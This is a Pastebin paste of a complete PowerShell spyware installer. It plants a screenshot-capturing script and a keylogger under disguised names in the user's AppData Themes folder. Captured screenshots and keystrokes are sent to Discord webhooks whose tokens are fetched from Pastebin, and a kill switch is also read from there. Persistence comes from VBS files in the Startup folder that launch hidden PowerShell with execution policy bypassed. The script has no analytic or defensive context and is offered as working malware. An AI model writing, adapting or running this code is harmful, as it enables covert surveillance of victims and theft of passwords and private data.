Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Assume the tokens have been retrieved and stored in these variables
- $screenwebhooktoken = irm 'https://pastebin.com/raw/c8fg78KU'
- $logwebhooktoken = irm 'https://pastebin.com/raw/STyjVHJR'
- $killurl = 'https://pastebin.com/raw/aNPVXCZQ'
- # Base URL for the Discord webhook
- $webhookurl = 'https://discord.com/api/webhooks/'
- # Construct the full webhook URLs by concatenating the base URL with the tokens
- $screenwebhook = $webhookurl + $screenwebhooktoken
- $logwebhook = $webhookurl + $logwebhooktoken
- $scps1 = @'
- $Path = "$env:Temp\ffmpeg.exe"
- If (!(Test-Path $Path)){
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":hourglass: ``Downloading ffmpeg.exe. Please wait...`` :hourglass:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
- $zipUrl = 'https://www.gyan.dev/ffmpeg/builds/packages/ffmpeg-7.0-essentials_build.zip'
- $tempDir = "$env:temp"
- $zipFilePath = Join-Path $tempDir 'ffmpeg-7.0-essentials_build.zip'
- $extractedDir = Join-Path $tempDir 'ffmpeg-7.0-essentials_build'
- Invoke-WebRequest -Uri $zipUrl -OutFile $zipFilePath
- Expand-Archive -Path $zipFilePath -DestinationPath $tempDir -Force
- Move-Item -Path (Join-Path $extractedDir 'bin\ffmpeg.exe') -Destination $tempDir -Force
- Remove-Item -Path $zipFilePath -Force
- Remove-Item -Path $extractedDir -Recurse -Force
- }
- $mkvPath = "$env:Temp\ScreenClip.jpg"
- if (Test-Path $mkvpath){
- rm -Path $mkvPath -Force
- }
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":arrows_counterclockwise: ``Taking Screenshots..`` :arrows_counterclockwise:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
- while ($true){
- .$env:Temp\ffmpeg.exe -f gdigrab -i desktop -frames:v 1 -vf "fps=1" $mkvPath
- sleep 2
- curl.exe -F file1=@"$mkvPath" $hurl | Out-Null
- sleep 5
- rm -Path $mkvPath -Force
- $response = irm $killurl
- if ($response -like "kill") {
- rm -path "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1"
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":octagonal_sign: ``REMOVED`` :octagonal_sign:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $hurl -Method Post -ContentType "application/json" -Body $jsonsys
- exit
- }
- }
- '@
- "`$hurl = '$screenwebhook' ; `$killurl = '$killurl'" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1" -Force
- $scps1 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\ffmpeg.ps1" -Append -Force
- $klps1 = @'
- $API = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
- public static extern short GetAsyncKeyState(int virtualKeyCode);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int GetKeyboardState(byte[] keystate);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int MapVirtualKey(uint uCode, int uMapType);
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
- '@
- $klps2 = @'
- $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru
- $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew()
- $KeypressThreshold = [TimeSpan]::FromSeconds(10)
- While ($true){
- $keyPressed = $false
- try{
- while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) {
- Start-Sleep -Milliseconds 30
- for ($asc = 8; $asc -le 254; $asc++){
- $keyst = $API::GetAsyncKeyState($asc)
- if ($keyst -eq -32767) {
- $keyPressed = $true
- $LastKeypressTime.Restart()
- $null = [console]::CapsLock
- $vtkey = $API::MapVirtualKey($asc, 3)
- $kbst = New-Object Byte[] 256
- $checkkbst = $API::GetKeyboardState($kbst)
- $logchar = New-Object -TypeName System.Text.StringBuilder
- if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) {
- $LString = $logchar.ToString()
- if ($asc -eq 8) {$LString = "[BKSP]"}
- if ($asc -eq 13) {$LString = "[ENT]"}
- if ($asc -eq 27) {$LString = "[ESC]"}
- $send += $LString
- }
- }
- }
- $response = irm $killurl
- if ($response -like "kill") {
- rm -path "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1"
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":octagonal_sign: ``REMOVED`` :octagonal_sign:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
- exit
- }
- }
- }
- finally{
- If ($keyPressed) {
- $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')}
- $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss"
- $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`'
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json
- Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
- $send = ""
- $keyPressed = $false
- }
- }
- $LastKeypressTime.Restart()
- Start-Sleep -Milliseconds 10
- }
- '@
- "`$dc = '$logwebhook' ; `$killurl = '$killurl'" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Force
- $klps1 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
- "'@" | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
- $klps2 | Out-File -FilePath "$env:APPDATA\Microsoft\Windows\Themes\update_check.ps1" -Append -Force
- $tobat = @'
- Set objShell = CreateObject("WScript.Shell")
- WScript.Sleep 500
- objShell.Run "powershell.exe -NoP -NonI -Exec Bypass -W Hidden -File ""%APPDATA%\Microsoft\Windows\Themes\ffmpeg.ps1""", 0, True
- '@
- $pth = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\service.vbs"
- $tobat | Out-File -FilePath $pth -Force
- $tobat2 = @'
- Set objShell = CreateObject("WScript.Shell")
- WScript.Sleep 500
- objShell.Run "powershell.exe -NoP -NonI -Exec Bypass -W Hidden -File ""%APPDATA%\Microsoft\Windows\Themes\update_check.ps1""", 0, True
- '@
- $pth2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"
- $tobat2 | Out-File -FilePath $pth2 -Force
- $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":white_check_mark: ``Persistance Installed!`` :white_check_mark:"} | ConvertTo-Json
- Invoke-RestMethod -Uri $screenwebhook -Method Post -ContentType "application/json" -Body $jsonsys
- sleep 1
- & $pth
- sleep 1
- & $pth2
- pause
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement